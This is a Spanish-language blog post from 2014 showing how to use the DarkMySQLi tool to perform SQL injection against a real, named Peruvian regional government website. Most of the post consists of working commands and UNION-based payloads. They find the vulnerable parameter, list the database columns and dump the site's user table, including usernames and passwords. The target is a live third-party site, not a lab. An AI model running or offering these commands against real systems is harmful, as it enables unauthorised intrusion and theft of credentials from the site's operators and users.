martes, 22 de abril de 2014

SQL Inyeccion con DarkMySQLi

    


DarkMySQLi es una herramienta de código abierto la cual nos permite inyectar de forma automática y extraer la información de las base de datos de una web.

Vamos a la acción ! 


El primer paso que haremos primero sera encontrar la web vulnerable en este caso utilizare la siguiente :

http://www.regionsanmartin.gob.pe/institucional/ini.php?Area='3

Ejecutaremos el siguiente comando para el testeo de la web :
 
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3" --findcol





  como vemos nos voto la información principal para saber si es vulnerable a la Inyección DarkMySQLi  :
 
[!] darkMySQLi URL: http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de--

luego que sabemos que es vulnerable a la inyección pondremos el siguiente comando :

 python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+1,2,darkc0de,4--" --full

(solo reemplazamos el numero " 3 " por " darkc0de "


Como vemos nos a votado las columnas de las base de datos clasificándolas por cada uno de ellas en sus respectivas "tablas" de manera que podamos identificarlos fácilmente los datos almacenados.

Lo que haremos a continuación sera dumpear las columnas de los usuarios con el siguiente comando :

python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+1,2,darkc0de,4--" --dump -D regionsanmartin_gob_pe -T usuarios -C nomb_usuario,pass,tipo_usuario


Imagen completa de usuarios 



    Espero les aya gustado mucho el Post, un saludo y un abrazo desde PERU" 

0 comentarios:

Publicar un comentario

Datos del Autor


Obra de K. Haring

Hola, mi nombre es omar soy estudiante de Ingenieria de sistemas en Perú. actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.


"Me considero un novato en busca de conocimiento"


Entradas Populares